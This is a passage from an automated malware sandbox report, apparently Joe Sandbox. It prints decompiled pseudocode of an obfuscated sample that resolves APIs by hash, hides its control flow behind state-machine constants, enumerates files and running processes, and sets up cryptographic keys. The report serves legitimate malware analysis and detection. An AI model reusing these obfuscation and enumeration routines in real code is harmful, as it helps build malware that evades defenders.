											E022C38F0( &_v524, _t97, _a4, _a8);
											_t98 = _t98 + 0x1c;
											E022C3460(_t96);
											_t22 = 0x60b76e4;
										}
									} else {
										_t33 = _v1590;
										if(_t33 == 0 || _t33 == 0x2e && _v1588 == 0) {
											L29:
											_t22 = 0x60b76e4;
										} else {
											goto L30;
										}
									}
								}
								continue;
							}
						}
						L40:
					}
					if(_t100 == 0) {
						if( *0x22ce004 == 0) {
							 *0x22ce004 = E022C3E80(_t58, E022C3F20(0xbb398380), 0xf53ce71f, _t97);
						}
						_t35 = FindFirstFileW( &_v1044,  &_v1636); // executed
						_t58 = _t35;
						if(_t58 == 0xffffffff) {
							return _t35;
						} else {
							_t22 = 0x3aa0d798;
							goto L1;
						}
					} else {
						if(_t22 == 0x1c39f1c) {
							_t95 = E022C34C0(0x22cd240);
							_t39 =  *0x22cdc60;
							if(_t39 == 0) {
								_t39 = E022C3E80(_t58, E022C3F20(0xe66945e6), 0xcca28b0d, _t97);
								 *0x22cdc60 = _t39;
							}
							 *_t39( &_v1044, 0x104, _t95, _t93);
							_t41 =  *0x22cdea8;
							_t98 = _t98 + 0x10;
							if(_t41 == 0) {
								_t41 = E022C3E80(_t58, E022C3F20(0xbb398380), 0x97f883e, _t97);
								 *0x22cdea8 = _t41;
							}
							_t94 =  *_t41();
							_t43 =  *0x22ce1a0;
							if(_t43 == 0) {
								_t43 = E022C3E80(_t58, E022C3F20(0xbb398380), 0x26c3f343, _t97);
								 *0x22ce1a0 = _t43;
							}
							 *_t43(_t94, 0, _t95);
							_t93 = _v1652;
							_t22 = 0xd5d5438;
							goto L1;
						} else {
							if(_t22 == 0x60b76e4) {
								if( *0x22cdfd4 == 0) {
									 *0x22cdfd4 = E022C3E80(_t58, E022C3F20(0xbb398380), 0xd3e90d14, _t97);
								}
								_t49 = FindNextFileW(_t58,  &_v1636); // executed
								asm("sbb eax, eax");
								_t22 = ( ~_t49 & 0x344f21a3) + 0x651b5f5;
								goto L1;
							} else {
								if(_t22 == 0x651b5f5) {
									if( *0x22ce064 == 0) {
										 *0x22ce064 = E022C3E80(_t58, E022C3F20(0xbb398380), 0xa4a77084, _t97);
									}
									_t55 = FindClose(_t58); // executed
									return _t55;
								}
								goto L6;
							}
						}
					}
					goto L40;
					L6:
				} while (_t22 != 0x36605fc2);
				return _t22;
				goto L40;
			}

0x022c38fa
0x022c38fc
0x022c38fe
0x022c3902
0x022c3907
0x022c390b
0x022c3910
0x022c3910
0x022c3910
0x022c3910
0x022c3915
0x00000000
0x00000000
0x022c3a79
0x022c3b62
0x00000000
0x022c3a7f
0x022c3a84
0x00000000
0x022c3a8a
0x022c3a8f
0x022c3b48
0x022c3b51
0x022c3b58
0x022c3a95
0x022c3a9b
0x022c3abf
0x022c3ac1
0x00000000
0x022c3ac3
0x022c3acd
0x022c3acf
0x022c3ad6
0x022c3ae9
0x022c3aee
0x022c3aee
0x022c3b07
0x022c3b23
0x022c3b28
0x022c3b2d
0x022c3b32
0x022c3b32
0x022c3a9d
0x022c3a9d
0x022c3aa5
0x022c3ab5
0x022c3ab5
0x00000000
0x00000000
0x00000000
0x022c3aa5
0x022c3a9b
0x00000000
0x022c3a8f
0x022c3a84
0x00000000
0x022c3a79
0x022c391b
0x022c3a33
0x022c3a4b
0x022c3a4b
0x022c3a5d
0x022c3a5f
0x022c3a64
0x022c3b9d
0x022c3a6a
0x022c3a6a
0x00000000
0x022c3a6a
0x022c3921
0x022c3926
0x022c3992
0x022c3994
0x022c399b
0x022c39ae
0x022c39b3
0x022c39b3
0x022c39c7
0x022c39c9
0x022c39ce
0x022c39d3
0x022c39e6
0x022c39eb
0x022c39eb
0x022c39f2
0x022c39f4
0x022c39fb
0x022c3a0e
0x022c3a13
0x022c3a13
0x022c3a1c
0x022c3a1e
0x022c3a22
0x00000000
0x022c3928
0x022c392d
0x022c3953
0x022c396b
0x022c396b
0x022c3976
0x022c397a
0x022c3981
0x00000000
0x022c392f
0x022c3934
0x022c3b73
0x022c3b8b
0x022c3b8b
0x022c3b91
0x00000000
0x022c3b91
0x00000000
0x022c3934
0x022c392d
0x022c3926
0x00000000
0x022c393a
0x022c393a
0x022c394b
0x00000000

APIs

FindNextFileW.KERNELBASE(?,?,00000000,022C998D,16BF64F2,00000001), ref: 022C3976
FindFirstFileW.KERNELBASE(?,?,00000000,022C998D,16BF64F2,00000001), ref: 022C3A5D
FindClose.KERNELBASE(?,00000000,022C998D,16BF64F2,00000001), ref: 022C3B91

Strings

Ei, xrefs: 022C3AD8
8T], xrefs: 022C3910
., xrefs: 022C3A95
8T], xrefs: 022C3A22
Ei, xrefs: 022C399D

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$8T]$8T]$Ei$Ei
API String ID: 3541575487-3972632629
Opcode ID: 33f1ff3c3683610e5303ef34eeb84b0f8ee17e09997b261d49e081d694406e7a
Instruction ID: f45e2b43af4a94cdf2dc955062728b1bdda211d942a62c07b6dac148f6c45d6e
Opcode Fuzzy Hash: 33f1ff3c3683610e5303ef34eeb84b0f8ee17e09997b261d49e081d694406e7a
Instruction Fuzzy Hash: 4C51097576430157C738EAF8A8446FB36A6ABC0204F308FADE945C7248EE76C91587D3

Uniqueness

Uniqueness Score: -1.00%

Function 022C4CB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E022C4CB0(intOrPtr* __ecx, void* __edx) {
				void* _v556;
				void* _v560;
				void* __ebx;
				void* _t5;
				signed int _t7;
				int _t13;
				signed int _t17;
				void* _t24;
				intOrPtr* _t27;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t47;

				_t44 = _v560;
				_t27 = __ecx;
				_t43 = __edx;
				_t5 = 0x166df8ad;
				goto L1;
				do {
					while(1) {
						L1:
						_t47 = _t5 - 0x31709247;
						if(_t47 > 0) {
							break;
						}
						if(_t47 == 0) {
							_t17 =  *_t27( &_v556, _t43);
							asm("sbb eax, eax");
							_t5 = ( ~_t17 & 0xfe0bf6b3) + 0x395ce26e;
							continue;
						} else {
							if(_t5 == 0x1c199) {
								_v556 = 0x22c;
								if( *0x22cdeb4 == 0) {
									 *0x22cdeb4 = E022C3E80(_t27, E022C3F20(0xbb398380), 0x6e59538e, _t45);
								}
								L13:
								_t7 = Process32NextW(_t44,  &_v556); // executed
								asm("sbb eax, eax");
								_t5 = ( ~_t7 & 0xf813afd9) + 0x395ce26e;
								continue;
							} else {
								if(_t5 == 0x71faaa2) {
									if( *0x22cdbd8 == 0) {
										 *0x22cdbd8 = E022C3E80(_t27, E022C3F20(0xbb398380), 0xc9ddf643, _t45);
									}
									_t24 = CreateToolhelp32Snapshot(2, 0); // executed
									_t44 = _t24;
									if(_t44 == 0xffffffff) {
										return _t24;
									} else {
										_t5 = 0x1c199;
										continue;
									}
								} else {
									if(_t5 != 0x166df8ad) {
										goto L17;
									} else {
										_t5 = 0x71faaa2;
										continue;
									}
								}
							}
						}
						L25:
					}
					if(_t5 == 0x3768d921) {
						if( *0x22cdecc == 0) {
							 *0x22cdecc = E022C3E80(_t27, E022C3F20(0xbb398380), 0xc021696d, _t45);
						}
						goto L13;
					} else {
						if(_t5 == 0x395ce26e) {
							if( *0x22cdc70 == 0) {
								 *0x22cdc70 = E022C3E80(_t27, E022C3F20(0xbb398380), 0x560d239b, _t45);
							}
							_t13 = FindCloseChangeNotification(_t44); // executed
							return _t13;
						}
						goto L17;
					}
					goto L25;
					L17:
				} while (_t5 != 0x3925027b);
				return _t5;
				goto L25;
			}

0x022c4cb8
0x022c4cbc
0x022c4cbf
0x022c4cc1
0x022c4cc6
0x022c4cd0
0x022c4cd0
0x022c4cd0
0x022c4cd0
0x022c4cd5
0x00000000
0x00000000
0x022c4cdb
0x022c4d8a
0x022c4d8e
0x022c4d95
0x00000000
0x022c4ce1
0x022c4ce6
0x022c4d42
0x022c4d4c
0x022c4d64
0x022c4d64
0x022c4d69
0x022c4d6f
0x022c4d73
0x022c4d7a
0x00000000
0x022c4ce8
0x022c4ced
0x022c4d08
0x022c4d20
0x022c4d20
0x022c4d29
0x022c4d2b
0x022c4d30
0x022c4e18
0x022c4d36
0x022c4d36
0x00000000
0x022c4d36
0x022c4cef
0x022c4cf4
0x00000000
0x022c4cfa
0x022c4cfa
0x00000000
0x022c4cfa
0x022c4cf4
0x022c4ced
0x022c4ce6
0x00000000
0x022c4cdb
0x022c4da4
0x022c4dc9
0x022c4de1
0x022c4de1
0x00000000
0x022c4da6
0x022c4dab
0x022c4def
0x022c4e07
0x022c4e07
0x022c4e0d
0x00000000
0x022c4e0d
0x00000000
0x022c4dab
0x00000000
0x022c4dad
0x022c4dad
0x022c4dc1
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022C4D29
Process32NextW.KERNEL32(00000000,?,?,00000000,?), ref: 022C4D6F
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,?), ref: 022C4E0D

Strings

n\9, xrefs: 022C4DA6

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: ChangeCloseCreateFindNextNotificationProcess32SnapshotToolhelp32
String ID: n\9
API String ID: 1306606082-3894687320
Opcode ID: d3172ebfff736abbfc2ff52d0c8034495c3bb3cd40319f71824713e1091d1973
Instruction ID: 7041ea055b87f2199226bd3c3b1fbcb7911213a9a72f22eb5299dda6fdc9e238
Opcode Fuzzy Hash: d3172ebfff736abbfc2ff52d0c8034495c3bb3cd40319f71824713e1091d1973
Instruction Fuzzy Hash: 1031C665770202678724BAF9B46466F22AA5B80608F344F6EF411C725CEA68CD5587D2

Uniqueness

Uniqueness Score: -1.00%

Function 022C2650, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E022C2650(intOrPtr* __ecx) {
				char _v4;
				char _v8;
				intOrPtr _v32;
				intOrPtr _t16;
				intOrPtr* _t17;
				intOrPtr* _t21;
				intOrPtr _t26;
				signed int _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t32;
				intOrPtr* _t33;
				intOrPtr* _t35;
				signed int _t36;
				intOrPtr* _t37;
				intOrPtr _t39;
				intOrPtr* _t42;
				void* _t52;
				intOrPtr _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				intOrPtr _t69;
				intOrPtr _t76;
				intOrPtr* _t84;
				intOrPtr* _t85;
				intOrPtr* _t91;
				intOrPtr* _t96;
				signed int _t97;
				void* _t108;
				void* _t110;
				void* _t111;

				_t96 = __ecx;
				_t97 = 0x50194b2;
				goto L1;
				do {
					while(1) {
						L1:
						_t110 = _t97 - 0x1e656080;
						if(_t110 > 0) {
							break;
						}
						if(_t110 == 0) {
							_t84 =  *0x22cdddc;
							__eflags = _t84;
							if(_t84 == 0) {
								_t84 = E022C3E80(_t52, E022C3F20(0x667fdee), 0x41956823, _t108);
								 *0x22cdddc = _t84;
							}
							_t16 =  *0x22ce2e4; // 0x7792e8
							_t4 = _t16 + 0x18; // 0x779300
							_t17 =  *_t84( *((intOrPtr*)(_t16 + 8)), 0x8004, 0, 0, _t4); // executed
							__eflags = _t17;
							if(_t17 != 0) {
								return 1;
							} else {
								_t97 = 0x264cda0c;
								continue;
							}
						} else {
							_t111 = _t97 - 0xf71ec4a;
							if(_t111 > 0) {
								__eflags = _t97 - 0x1032ae84;
								if(_t97 == 0x1032ae84) {
									_t21 =  *0x22cdccc; // 0x0
									__eflags = _t21;
									if(_t21 == 0) {
										_t21 = E022C3E80(_t52, E022C3F20(0x667fdee), 0x60964008, _t108);
										 *0x22cdccc = _t21;
									}
									_t57 =  *0x22ce2e4; // 0x7792e8
									 *_t21( *((intOrPtr*)(_t57 + 0x1c)));
									_t97 = 0x20769828;
									continue;
								} else {
									__eflags = _t97 - 0x17703602;
									if(_t97 == 0x17703602) {
										_t60 =  *0x22ce2e4; // 0x7792e8
										E022C4250(_t52, _t60);
										__eflags = 0;
										return 0;
									} else {
										goto L17;
									}
								}
							} else {
								if(_t111 == 0) {
									_t85 =  *0x22ce13c;
									__eflags = _t85;
									if(_t85 == 0) {
										_t85 = E022C3E80(_t52, E022C3F20(0x667fdee), 0x5f84d0c6, _t108);
										 *0x22ce13c = _t85;
									}
									_t26 =  *0x22ce2e4; // 0x7792e8
									_t1 = _t26 + 0x20; // 0x779308
									_t27 =  *_t85( *((intOrPtr*)(_t26 + 8)), 0x660e, 1, _t1); // executed
									asm("sbb esi, esi");
									_t97 = ( ~_t27 & 0x0e32b1fc) + 0x1032ae84;
									continue;
								} else {
									if(_t97 == 0x50194b2) {
										_t30 = E022C42F0(_t52, 0x24);
										 *0x22ce2e4 = _t30;
										__eflags = _t30;
										if(_t30 == 0) {
											goto L18;
										} else {
											_t97 = 0x85ecca9;
											continue;
										}
									} else {
										if(_t97 != 0x85ecca9) {
											goto L17;
										} else {
											_t31 =  *0x22cdee8;
											if(_t31 == 0) {
												_t31 = E022C3E80(_t52, E022C3F20(0x667fdee), 0x249f770b, _t108);
												 *0x22cdee8 = _t31;
											}
											_t65 =  *0x22ce2e4; // 0x7792e8
											_t32 =  *_t31(_t65 + 8, 0, 0, 0x18, 0xf0000040); // executed
											asm("sbb esi, esi");
											_t97 = ( ~_t32 & 0x0cc3aa0b) + 0x17703602;
											continue;
										}
									}
								}
							}
						}
						L47:
					}
					__eflags = _t97 - 0x2433e00d;
					if(__eflags > 0) {
						__eflags = _t97 - 0x264cda0c;
						if(_t97 != 0x264cda0c) {
							goto L17;
						} else {
							_t33 =  *0x22cdccc; // 0x0
							__eflags = _t33;
							if(_t33 == 0) {
								_t33 = E022C3E80(_t52, E022C3F20(0x667fdee), 0x60964008, _t108);
								 *0x22cdccc = _t33;
							}
							_t69 =  *0x22ce2e4; // 0x7792e8
							 *_t33( *((intOrPtr*)(_t69 + 0x20)));
							_t97 = 0x1032ae84;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t35 =  *0x22ce04c;
							__eflags = _t35;
							if(_t35 == 0) {
								_t35 = E022C3E80(_t52, E022C3F20(0x38bb5311), 0xa8366e55, _t108);
								 *0x22ce04c = _t35;
							}
							_t36 =  *_t35(0x10001, 0x13,  *_t96,  *((intOrPtr*)(_t96 + 4)), 0x8000, 0,  &_v8,  &_v4); // executed
							asm("sbb esi, esi");
							_t97 = ( ~_t36 & 0x029e39b6) + 0x20769828;
							goto L1;
						} else {
							__eflags = _t97 - 0x20769828;
							if(_t97 == 0x20769828) {
								_t37 =  *0x22ce084; // 0x0
								__eflags = _t37;
								if(_t37 == 0) {
									_t37 = E022C3E80(_t52, E022C3F20(0x667fdee), 0x476fbf6d, _t108);
									 *0x22ce084 = _t37;
								}
								_t76 =  *0x22ce2e4; // 0x7792e8
								 *_t37( *((intOrPtr*)(_t76 + 8)), 0);
								_t97 = 0x17703602;
								goto L1;
							} else {
								__eflags = _t97 - 0x2314d1de;
								if(_t97 == 0x2314d1de) {
									_t91 =  *0x22cddfc;
									__eflags = _t91;
									if(_t91 == 0) {
										_t91 = E022C3E80(_t52, E022C3F20(0x667fdee), 0xaba13237, _t108);
										 *0x22cddfc = _t91;
									}
									_t39 =  *0x22ce2e4; // 0x7792e8
									_t6 = _t39 + 0x1c; // 0x779304
									 *_t91( *((intOrPtr*)(_t39 + 8)), _v8, _v4, 0, 0, _t6); // executed
									asm("sbb esi, esi");
									_t42 =  *0x22cdd40;
									_t97 = (_t97 & 0xeefb5422) + 0x20769828;
									__eflags = _t42;
									if(_t42 == 0) {
										_t42 = E022C3E80(_t52, E022C3F20(0xbb398380), 0x7f92dfac, _t108);
										 *0x22cdd40 = _t42;
									}
									 *_t42(_v32);
								}
								goto L17;
							}
						}
					}
					goto L47;
					L17:
					__eflags = _t97 - 0x16a1826b;
				} while (_t97 != 0x16a1826b);
				L18:
				__eflags = 0;
				return 0;
				goto L47;
			}

0x022c2655
0x022c2657
0x022c2657
0x022c2660
0x022c2660
0x022c2660
0x022c2660
0x022c2666
0x00000000
0x00000000
0x022c266c
0x022c27bc
0x022c27c2
0x022c27c4
0x022c27dc
0x022c27de
0x022c27de
0x022c27e4
0x022c27e9
0x022c27f9
0x022c27fb
0x022c27fd
0x022c29af
0x022c2803
0x022c2803
0x00000000
0x022c2803
0x022c2672
0x022c2672
0x022c2678
0x022c275b
0x022c2761
0x022c2783
0x022c2788
0x022c278a
0x022c279d
0x022c27a2
0x022c27a2
0x022c27a7
0x022c27b0
0x022c27b2
0x00000000
0x022c2763
0x022c2763
0x022c2769
0x022c2992
0x022c2998
0x022c299e
0x022c29a4
0x00000000
0x00000000
0x00000000
0x022c2769
0x022c267e
0x022c267e
0x022c2707
0x022c270d
0x022c270f
0x022c2727
0x022c2729
0x022c2729
0x022c272f
0x022c2734
0x022c2742
0x022c2748
0x022c2750
0x00000000
0x022c2684
0x022c268a
0x022c26ef
0x022c26f4
0x022c26f9
0x022c26fb
0x00000000
0x022c26fd
0x022c26fd
0x00000000
0x022c26fd
0x022c268c
0x022c2692
0x00000000
0x022c2698
0x022c2698
0x022c269f
0x022c26b2
0x022c26b7
0x022c26b7
0x022c26bc
0x022c26d1
0x022c26d7
0x022c26df
0x00000000
0x022c26df
0x022c2692
0x022c268a
0x022c267e
0x022c2678
0x00000000
0x022c266c
0x022c280d
0x022c2813
0x022c294d
0x022c2953
0x00000000
0x022c2959
0x022c2959
0x022c295e
0x022c2960
0x022c2973
0x022c2978
0x022c2978
0x022c297d
0x022c2986
0x022c2988
0x00000000
0x022c2988
0x022c2819
0x022c2819
0x022c28f3
0x022c28f8
0x022c28fa
0x022c290d
0x022c2912
0x022c2912
0x022c2934
0x022c293a
0x022c2942
0x00000000
0x022c281f
0x022c281f
0x022c2825
0x022c28b8
0x022c28bd
0x022c28bf
0x022c28d2
0x022c28d7
0x022c28d7
0x022c28dc
0x022c28e7
0x022c28e9
0x00000000
0x022c282b
0x022c282b
0x022c2831
0x022c2837
0x022c283d
0x022c283f
0x022c2857
0x022c2859
0x022c2859
0x022c285f
0x022c2864
0x022c2877
0x022c287b
0x022c287d
0x022c2888
0x022c288e
0x022c2890
0x022c28a3
0x022c28a8
0x022c28a8
0x022c28b1
0x022c28b1
0x00000000
0x022c2831
0x022c2825
0x022c2819
0x00000000
0x022c276f
0x022c276f
0x022c276f
0x022c277c
0x022c277c
0x022c2782
0x00000000

APIs

CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00008000,00000000,?,?,?), ref: 022C2934

Strings

3$, xrefs: 022C280D

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: CryptDecodeObject
String ID: 3$
API String ID: 1207547050-3878113309
Opcode ID: 9b59f1c5d0a24834c9c179fc7faf4e5b41649e11eba612897cdd573bed54723f
Instruction ID: 677d5c0fe0d86c568f94458208e2e716ee978d58a595a06d181b194e18aff1c9
Opcode Fuzzy Hash: 9b59f1c5d0a24834c9c179fc7faf4e5b41649e11eba612897cdd573bed54723f
Instruction Fuzzy Hash: 8271FD72F60212DBCB14FAE8EC54B963293AB84604F314B7DED469B25CDE719C118BD2

Uniqueness

Uniqueness Score: -1.00%

Function 022C8240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E022C8240(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t86;
				intOrPtr* _t88;
				void* _t100;
				void* _t101;
				intOrPtr* _t103;
				intOrPtr* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				unsigned int _t138;
				void* _t140;
				void* _t141;
				signed int _t142;
				intOrPtr _t144;
				void* _t145;
				void* _t148;

				_t145 = __ebp;
				_t112 = __ebx;
				_v592 = 0xe2e3;
				_v592 = _v592 ^ 0xd0dd7a16;
				_t142 = 0x20540118;
				_v592 = _v592 * 0x3d;
				_v592 = _v592 | 0xc45f2d48;
				_v592 = _v592 + 0xffffa838;
				_v592 = _v592 + 0xde6b;
				_v592 = _v592 ^ 0xf67dff2c;
				_v592 = _v592 + _v592 * 4 << 2;
				_v592 = _v592 ^ 0xf4577600;
				_v584 = 0xc2f;
				_v584 = _v584 << 0xb;
				_v584 = _v584 * 0x17;
				_v584 = _v584 >> 8;
				_v584 = _v584 ^ 0x0008c1c9;
				_v580 = 0xfdf2;
				_v580 = _v580 << 7;
				_v580 = _v580 ^ 0x007ef903;
				_v588 = 0xe94a;
				_v588 = _v588 ^ 0xa24bbed7;
				_v588 = _v588 | 0x3a5f93cf;
				_t113 = _v588;
				_t141 = _v580;
				_v588 = (_v588 - (0x2c9fb4d9 * _t113 >> 0x20) >> 1) + (0x2c9fb4d9 * _t113 >> 0x20) >> 6;
				_v588 = _v588 | 0xa489ddc5;
				_v588 = _v588 + 0xf775;
				_t138 = 0x1b4e81b5 * _v588 >> 0x20 >> 3;
				_v588 = _t138;
				_v588 = _v588 ^ 0x0235bf01;
				while(1) {
					L1:
					_t148 = _t142 - 0x17c5ef14;
					if(_t148 > 0) {
						break;
					}
					if(_t148 == 0) {
						_t86 =  *0x22cdfec;
						__eflags = _t86;
						if(_t86 == 0) {
							_t111 = E022C3F20(0xbb398380);
							_t138 = 0xd4fa8936;
							_t86 = E022C3E80(_t112, _t111, 0xd4fa8936, _t145);
							 *0x22cdfec = _t86;
						}
						 *_t86( &_v572);
						_t142 = 0x2295af4;
						continue;
					} else {
						if(_t142 == 0xa7036f) {
							_t88 =  *0x22cde58;
							__eflags = _t88;
							if(_t88 == 0) {
								_t110 = E022C3F20(0xbb398380);
								_t138 = 0xb1aefb5;
								_t88 = E022C3E80(_t112, _t110, 0xb1aefb5, _t145);
								 *0x22cde58 = _t88;
							}
							 *_t88(0,  &_v524, 0x104);
							_t142 = 0xfef53a6;
							continue;
						} else {
							if(_t142 == 0x2295af4) {
								_v580 = 0xa8c00;
								_v576 = 0;
								_v596 = E022CB590(_v580, _v576, 0x989680, 0);
								_v592 = _t138;
								_t140 = _v588 - _v564;
								_t144 = _v596;
								asm("sbb ecx, [esp+0x3c]");
								__eflags = _v584 - _v592;
								if(__eflags < 0) {
									goto L24;
								} else {
									if(__eflags > 0) {
										L29:
										return 1;
									} else {
										__eflags = _t140 - _t144;
										if(_t140 < _t144) {
											goto L24;
										} else {
											goto L29;
										}
									}
								}
							} else {
								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x22cdfbc == 0) {
										_t101 = E022C3F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x22cdfbc = E022C3E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x22ce1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E022C3F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E022C3E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x22ce1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x22cdc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E022C3F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E022C3E80(_t112, _t108, 0x560d239b, _t145);
							 *0x22cdc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x022c8240
0x022c8240
0x022c8246
0x022c824e
0x022c825d
0x022c8262
0x022c8266
0x022c826e
0x022c8276
0x022c827e
0x022c8290
0x022c8294
0x022c829c
0x022c82a4
0x022c82ae
0x022c82b7
0x022c82bc
0x022c82c4
0x022c82cc
0x022c82d1
0x022c82d9
0x022c82e1
0x022c82e9
0x022c82f1
0x022c82f7
0x022c8309
0x022c830d
0x022c8315
0x022c8323
0x022c8326
0x022c832a
0x022c8332
0x022c8332
0x022c8332
0x022c8338
0x00000000
0x00000000
0x022c833e
0x022c83fc
0x022c8401
0x022c8403
0x022c840a
0x022c840f
0x022c8416
0x022c841b
0x022c841b
0x022c8425
0x022c8427
0x00000000
0x022c8344
0x022c834a
0x022c83c0
0x022c83c5
0x022c83c7
0x022c83ce
0x022c83d3
0x022c83da
0x022c83df
0x022c83df
0x022c83f0
0x022c83f2
0x00000000
0x022c834c
0x022c8352
0x022c84cf
0x022c84d7
0x022c84f7
0x022c84fb
0x022c8503
0x022c8507
0x022c850b
0x022c8513
0x022c8515
0x00000000
0x022c8517
0x022c8517
0x022c851e
0x022c852a
0x022c8519
0x022c8519
0x022c851b
0x00000000
0x00000000
0x00000000
0x00000000
0x022c851b
0x022c8517
0x022c8358
0x022c835e
0x022c84ac
0x022c84ac
0x022c84b2
0x00000000
0x00000000
0x00000000
0x00000000
0x022c8364
0x022c836c
0x022c8373
0x022c8378
0x022c8386
0x022c8386
0x022c83a9
0x022c83ab
0x022c83b0
0x022c84b8
0x022c84b8
0x022c84c2
0x022c83b6
0x022c83b6
0x00000000
0x022c83b6
0x022c83b0
0x022c835e
0x022c8352
0x022c834a
0x00000000
0x022c833e
0x022c8431
0x022c8437
0x022c84c3
0x00000000
0x022c843d
0x022c843d
0x022c8443
0x022c8445
0x022c844a
0x022c844c
0x022c8453
0x022c8458
0x022c845f
0x022c8464
0x022c8464
0x022c8473
0x022c8477
0x022c8479
0x022c8484
0x022c848a
0x022c848c
0x022c8493
0x022c8498
0x022c849f
0x022c84a4
0x022c84a4
0x022c84aa
0x022c84aa
0x00000000
0x022c8443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022C83A9

Strings

J, xrefs: 022C82D9

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: ca8356a3fd91d323950b4554b94731f7baf8a97761cdfa4a9aae5f78f3354b82
Instruction ID: e898978513352d486b108bda815f17980932cc93004c1179f4710831885d85a1
Opcode Fuzzy Hash: ca8356a3fd91d323950b4554b94731f7baf8a97761cdfa4a9aae5f78f3354b82
Instruction Fuzzy Hash: A261DF72A143019BC718DFA8D484A2FB7E5BBC4744F208E2DF4959B288D774C9098F93

Uniqueness

Uniqueness Score: -1.00%

Function 022C2290, Relevance: 2.8, Strings: 2, Instructions: 260
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E022C2290(signed int* __ecx, signed int* __edx) {
				char _v25;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				char _v124;
				signed int _v128;
				signed int* _v132;
				signed int* _v136;
				signed int* _v140;
				signed int* _v144;
				signed int* _v148;
				signed int* _v152;
				signed int* _v156;
				signed int* _v160;
				signed int* _v164;
				void* __ebx;
				void* __ebp;
				signed int* _t61;
				intOrPtr _t63;
				signed int _t69;
				intOrPtr _t72;
				signed int _t79;
				signed int _t85;
				signed int _t86;
				signed int _t88;
				signed int _t89;
				intOrPtr _t92;
				signed int _t93;
				signed int _t98;
				signed int _t104;
				signed int _t106;
				signed int _t111;
				signed int* _t112;
				signed int _t113;
				signed int _t117;
				intOrPtr* _t120;
				signed int* _t139;
				signed int _t142;
				signed int _t147;
				void* _t148;
